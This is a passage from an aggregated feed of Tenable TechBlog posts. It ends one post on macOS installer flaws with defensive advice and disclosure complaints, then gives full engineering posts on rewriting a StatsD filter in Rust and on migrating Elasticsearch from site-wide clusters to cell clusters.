We understand that vulnerability triage teams are absolutely bombarded with half-baked vulnerability reports, but becoming unresponsive during the disclosure response, overusing canned messaging, or simply giving incorrect reasons should not be the norm and highlights many of the frustrations researchers experience when interacting with these larger organizations.

We want to point out that we do not blame any single organization or individual here and acknowledge that there may be bigger things going on behind the scenes that we are not privy to. It’s also totally possible that our reports or explanations were hot garbage and our points were not clearly made. In either case, though, communications from the vendors should have been better about what information was needed to clarify the issues before they were simply discarded.

Circling back to the issues at hand, what can users do to protect themselves? It’s impractical for everyone to manually audit each and every installer they interact with. The occasional spot check with Suspicious Package, which shows all scripts executed when an installer package is run, never hurts. In general, though, paying attention to proper code signatures (look for the lock in the upper righthand corner of the installer) goes a long way.

For developers, pay special attention to the directories and files being used during the installation process when creating distribution packages. In general, it’s best practice to use an installer sandbox whenever possible. When that isn’t possible, verifying the integrity of files as well as enforcing proper permissions on the directories and files being operated on is enough to mitigate these issues.

Further details on these discoveries can be found in TRA-2021–19, TRA-2021–20, and TRA-2021–21.


More macOS Installer Flaws was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

Optimizing 700 CPUs Away With Rust

By: Alan Ning
6 May 2021 at 15:31

In Tenable.io, we are heavy users of Datadog custom metrics. Millions of metrics are sent through Dogstatsd, providing deep insights into the complex platform. As the platform grew, we found that a significant number of metrics sent by legacy apps were obsolete. We tried to hunt down these obsoleted metrics in the codebase, but modifying legacy applications was extremely time consuming and risky.

To address this, we deployed a StatsD filter as a Datadog agent sidecar to filter out unnecessary metrics. The filter is a simple UDP datagram forwarder written in Node.js (sample, not actual code). We chose Node.js because in our environment, its network performance outstripped other languages that equalled its speed to production. We were able to implement, test and deploy this change across all of the T.io platform within a week.

statsd-filter-proxy is deployed as a sidecar to datadog-agent, filtering all StatsD traffic prior to DogstatsD.

While this worked for many months, performance issues began to crop up. As the platform continued to scale up, we were sending more and more metrics through the filter. During the first quarter of 2021, we added over 1.4 million new metrics as an effort to improve our observability. The filters needed more CPU resources to keep up with the new metrics. At this scale, even a minor inefficiency can lead to large wastage. Over time, we were consuming over 1000 CPUs and 400GB of memory on these filters. The overhead had become unacceptable.

We analyzed the performance metrics and decided to rewrite the filter in a more efficient language. We chose Rust for its high performance and safety characteristics. (See our other post on Rust evaluations) The source code of the new Rust-based filter is available here.

The Rust-based filter is much more efficient than the original implementation. With the ability to fully manage the heap allocations, Rust’s memory allocation for handling each datagram is kept to a minimum. This means that the Rust-based filter only needs a few MB of memory to operate. As a result, we saw a 75% reduction in CPU usage and a 95% reduction in memory usage in production.

Per pod, average CPU reduced from 800m to 200m core
Per pod, average memory reduced from 70MB to 5MB.

In addition to reclaiming compute resources, the latency per packet has also dropped by over 50%. While latency isn’t a key performance indicator for this application, it is rewarding to see that we are running twice as fast for a fraction of the resources.

With this small change, we were able to optimize away over 700 CPU and 300GB of memory. This was all implemented, tested and deployed in a single sprint (two weeks). Once the new filter was deployed, we were able to confirm the resource reduction in Datadog metrics.

CPU / Memory usage dropped drastically following the deployment

Source: https://github.com/tenable/statsd-filter-proxy-rs

TL;DR:

  • Replaced JS-based StatsD filter with Rust and received huge performance improvement.
  • At scale, even small optimization can result in a huge impact.

Optimizing 700 CPUs Away With Rust was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

Scaling Tenable.io — From Site to Cell

By: Alan Ning
4 March 2021 at 15:46

Scaling Tenable.io — From Site to Cell

Since the inception of Tenable.io, keeping up with data pressure has been a continuous challenge. This data pressure comes from two dimensions: the growth of the customer base and the growth of usage from each customer. This challenge has been most notable in Elasticsearch, since it is one of the most important stages in our petabytes-scale SaaS pipeline.

When customers run vulnerability scans, the Nessus scanners upload the scan data to Tenable.io. There, the data is broken down into documents detailing vulnerability information, including data such as asset information and cyber exposure details. These documents are then aggregated into an Elasticsearch index. However, when the index reached the scale of hundreds of nodes per cluster, the team discovered that further horizontal scaling would affect overall stability. We would encounter more hot shard problems, leading to uneven load across the index and affecting the user experience. This post will detail the re-architecture that both solved this scaling problem and achieved massive performance improvements for our customers.

Incremental Scaling from Site to Cell

Tenable.io scales by sites, which a site handles requests for a group of customers.

Each point of presence, called a site, contains a multi-tenant Elasticsearch instance to be used by geographically similar customers. As data pressure increases, however, horizontal scaling will cause instability, which will in turn cause instability at the site level.

To overcome this challenge, our overall strategy was to break out the site-wide (monolith) Elasticsearch cluster into multiple smaller, more manageable clusters. We call these smaller clusters cells. The rule is simple: If a customer has over 100 million documents, they will be isolated into their own cell. Smaller customers will be moved to one of the general population (GP) clusters. We came up with a technique to achieve zero downtime migration with massive performance gains.

Migrate from site to cell, where customer with large dataset may get their own Elasticsearch cluster.

Request Routing and Backfill

To achieve a zero downtime migration, we implemented two key pieces of software:

  1. An Elasticsearch proxy that can:
  • Transparently proxy any Elasticsearch request to any Elasticsearch cluster
  • Intelligently tee any write request (e.g. Index, Bulk) to one or more clusters

2. A Spark job that can:

  • Query specific customer data
  • Using parallelized scrolls, read the Spark dataframes from the monolith cluster
  • Map the Spark dataframes from the monolith cluster directly to the cell-based cluster

To start, we reconfigured micro-services to communicate with Elasticsearch through the proxy. Based on the targeted customer (more on this later), the proxy performed dual write to the old monolith cluster and the new cell-based cluster. Once the dual write began, all new documents started flowing to the new cell cluster. For all older documents, we ran a Spark job to pull old data from the monolith cluster to the new cell cluster. Finally, after the Spark job completed, we cut all new queries over to the new cell cluster.

A zero downtime backfill process. Step 1: start dual write. Step 2: Backfill old data. Step 3: Cutover reads.

Elasticsearch Proxy

With the cell architecture, we see a future where migrating customers from one Elasticsearch cluster to another is a common event. Customers in a multi-tenant cluster can easily outgrow the cluster’s capacity over time and require migration to other clusters. In addition, we need to reindex the data from time to time to adjust immutable settings (e.g. shard count). With this in mind, we want to make sure this type of migration is completely transparent to all the micro services. This is why we built a proxy to encapsulate all customer routing logic such that all data allocation is completely transparent to client services.

Elasticsearch proxy encapsulate all customer routing logic from all other services.

For the proxy to be able to route requests to the correct Elasticsearch clusters, it needs the customer ID to be sent along with each request. To achieve this, we injected a X-CUSTOMER-ID HTTP header in each search and index request. The proxy inspected the X-CUSTOMER-ID header in each request, looked up the customer to cluster mapping, and forwarded the request on to the correct cluster.

While search and index requests always target a single customer, a bulk request contains a large number of documents for numerous customers. A single X-CUSTOMER-ID HTTP header would not provide sufficient routing information for the request. To overcome this, we found an interesting hack in Elasticsearch.

A bulk request body is encoded in a newline-delimited JSON (NDJSON) structure. Each action line is an operation to be performed on a document. This is an example directly copied from Elasticsearch documentation:

We found that within an action line, you can append any amount of metadata to the line as long as it is outside the action body. Elasticsearch seems to accept the request and ignore the extra content with no side effects (verified with ES2 to ES7). With this technique, we modified all clients of the Summary index to append customer IDs to every action.

With this modification, the proxy has enough information to break down a bulk request into subrequests for each customer.

Spark Backfill

To backfill old data after dual writes were enabled, we used AWS EMR with the elasticsearch-hadoop SDK to perform parallel scrolls against every shard from the source index. As Spark retrieves the data in the Resilient Distributed Dataset (RDD) format, the same RDD can be written directly to the destination index. Since we’re backfilling old data, we want to make sure we don’t overwrite anything that’s already been written. To accomplish this, we set es.write.operation to “create”. (Look for an upcoming blog post about how Tenable uses Kotlin with EMR and Spark!)

Here’s some high level sample code:

To optimize the backfill performance, we performed steps similar to the ones taken by Soundcloud. Specifically, we found the following settings the most impactful:

  • Setting the index replica to 0
  • Setting the refresh interval to 5 minutes

However, since we are migrating data using a live production system, our primary goal is to minimize performance impact. In the end, we settled on indexing 9000 documents per second as the sweet spot. At this rate, migrating a large customer takes 10–20 hours, which is fast enough for this effort.

Performance Improvement

Since we started this effort, we have noticed drastic performance improvement. Elasticsearch scroll speed saw up to 15X performance improvement, and queries decreased in latency of up to several orders of magnitude.

The chart below is a large scroll request that goes through millions of vulnerabilities. Prior to the cell migration, it could take over 24 hours to run the full scroll. The scroll from the monolith cluster suffers slow performance from the frequent resource contention with other customers, and it is further slowed by our fairness algorithm’s throttling. After the customer is migrated to the cell cluster, the same scroll request completes in just over 1.5 hours. Not only is this a large improvement for this customer, but other customers also reap the benefits of the decrease in contention.

In Summary

Our change in scaling strategy has resulted in large performance improvements for the Tenable.io platform. The new request routing layer and backfill process gave us new powerful tools to shard customer data. The resharding process is streamlined to an easy, safe and zero downtime operation.

Overall, the team is thrilled with the end result. It took a lot of ingenuity, dedication, and teamwork to execute a zero downtime migration of this scale.

tl;dr:

  • Exponential customer growth on the Tenable.io platform led to a huge increase in the data stored in a monolithic Elasticsearch cluster to the point where it was becoming a challenge to scale further with the existing architecture.
  • We broke down the site monolith cluster to cell clusters to improve performance.
  • We migrated customer data through a custom proxy and Spark job, all with zero downtime.
  • Scrolls performance improved by 15x, and queries latency reduced by several orders of magnitude.

Brought to you by the Sharders team:
Alan Ning, Alex Barbour, Ciaran Gaffney, Jagan Kondapalli, Johnny Mao, Shannon Prickett, Ted O’Meara, Tristan Burch

Special thanks to Jack Matheson and Vincent Gilcreest for all the help with editing.


Scaling Tenable.io — From Site to Cell was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

❌
❌